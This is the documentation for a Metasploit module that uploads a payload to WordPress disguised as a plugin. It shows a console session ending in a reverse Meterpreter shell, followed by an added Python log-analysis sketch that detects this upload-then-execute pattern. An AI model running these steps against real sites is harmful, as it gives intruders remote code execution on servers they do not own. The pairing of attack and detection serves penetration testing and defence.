metasploit-gs/documentation/modules/exploit/unix/webapp/wp_admin_shell_upload.md
2017-04-24 15:48:55 -05:00
## Vulnerable Application
This module takes an administrator username and password, logs into the
admin panel, and uploads a payload packaged as a WordPress plugin.
Because this is authenticated code execution by design, it should work
on all versions of WordPress.
### Vulnerable Application Installation
You can get WordPress from [https://wordpress.org/download/](https://wordpress.org/download/)
or from some Linux package managers. [Debian maintains an installation
guide](https://wiki.debian.org/WordPress) that also works on Ubuntu.
Note that in a default install of WP from apt, the plugins directory is
owned by root, so unless you chown it to the web user, this module will
not work. Doing so is common in real-world deployments to allow
legitimate administrators to install plugins, so it is not unreasonable
for your own installation.
## Verification steps
```
msf > use exploit/unix/webapp/wp_admin_shell_upload
msf exploit(wp_admin_shell_upload) > set USERNAME admin
USERNAME => admin
msf exploit(wp_admin_shell_upload) > set PASSWORD password
PASSWORD => password
msf exploit(wp_admin_shell_upload) > set TARGETURI /wp/
TARGETURI => /wp/
msf exploit(wp_admin_shell_upload) > run
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Authenticating with WordPress using admin:password...
[+] Login successful
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[*] Acquired a plugin upload nonce: afa507398f
[*] Uploaded plugin iHNhrYLmGR
[*] Executing the payload at /wp/wp-content/plugins/iHNhrYLmGR/DcrpFXPOCG.php...
[*] Sending stage (33986 bytes) to 192.168.100.131
[*] Meterpreter session 2 opened (192.168.100.1:4444 -> 192.168.100.131:40039) at 2017-04-21 11:36:33 -0500
[+] Deleted DcrpFXPOCG.php
[+] Deleted iHNhrYLmGR.php
meterpreter > pwd
/var/lib/wordpress/wp-content/plugins/iHNhrYLmGR
meterpreter >
```
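
For defenders, the run above leaves a recognizable trail in the web server's access log: a plugin upload followed shortly by a direct request for a `.php` file under `wp-content/plugins/` from the same client. The following detection sketch is an added example, not part of the Metasploit documentation; it assumes Apache combined log format and WordPress's standard `wp-admin/update.php?action=upload-plugin` endpoint, and the log lines are constructed to mirror the session shown.

```python
import re
from datetime import datetime, timedelta

# Constructed sample access-log lines (not captured traffic), modelled on the run above.
SAMPLE_LOG = """\
192.168.100.1 - - [21/Apr/2017:11:36:30 -0500] "POST /wp/wp-login.php HTTP/1.1" 302 - "-" "Mozilla/5.0"
192.168.100.1 - - [21/Apr/2017:11:36:32 -0500] "POST /wp/wp-admin/update.php?action=upload-plugin HTTP/1.1" 200 4313 "-" "Mozilla/5.0"
192.168.100.1 - - [21/Apr/2017:11:36:33 -0500] "GET /wp/wp-content/plugins/iHNhrYLmGR/DcrpFXPOCG.php HTTP/1.1" 200 - "-" "Mozilla/5.0"
192.168.100.7 - - [21/Apr/2017:11:40:02 -0500] "GET /wp/wp-content/plugins/akismet/_inc/akismet.css HTTP/1.1" 200 812 "-" "Mozilla/5.0"
192.168.100.7 - - [21/Apr/2017:11:41:10 -0500] "POST /wp/wp-admin/update.php?action=upload-plugin HTTP/1.1" 200 4313 "-" "Mozilla/5.0"
"""

# client, timestamp, method, request path
LINE = re.compile(r'(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*"')
UPLOAD = re.compile(r'/wp-admin/update\.php\?(?:.*&)?action=upload-plugin')
PLUGIN_PHP = re.compile(r'/wp-content/plugins/([^/?]+)/[^?]*\.php(?:\?|$)')


def find_upload_then_exec(log_text, window=timedelta(seconds=60)):
    """Return (client, upload_time, plugin_dir, path) for every direct .php
    request under wp-content/plugins/ that follows a plugin upload from the
    same client within `window`."""
    last_upload = {}  # client address -> time of its most recent plugin upload
    hits = []
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue  # skip lines that are not in the expected format
        client, ts, method, path = m.groups()
        when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
        if method == "POST" and UPLOAD.search(path):
            last_upload[client] = when
            continue
        php = PLUGIN_PHP.search(path)
        if php and client in last_upload:
            if timedelta(0) <= when - last_upload[client] <= window:
                hits.append((client, last_upload[client].isoformat(),
                             php.group(1), path))
    return hits


if __name__ == "__main__":
    for hit in find_upload_then_exec(SAMPLE_LOG):
        print(hit)
```

Legitimate plugin installs rarely involve a browser requesting a plugin's PHP file directly, so a hit is worth correlating with file-creation and deletion events in the plugins directory.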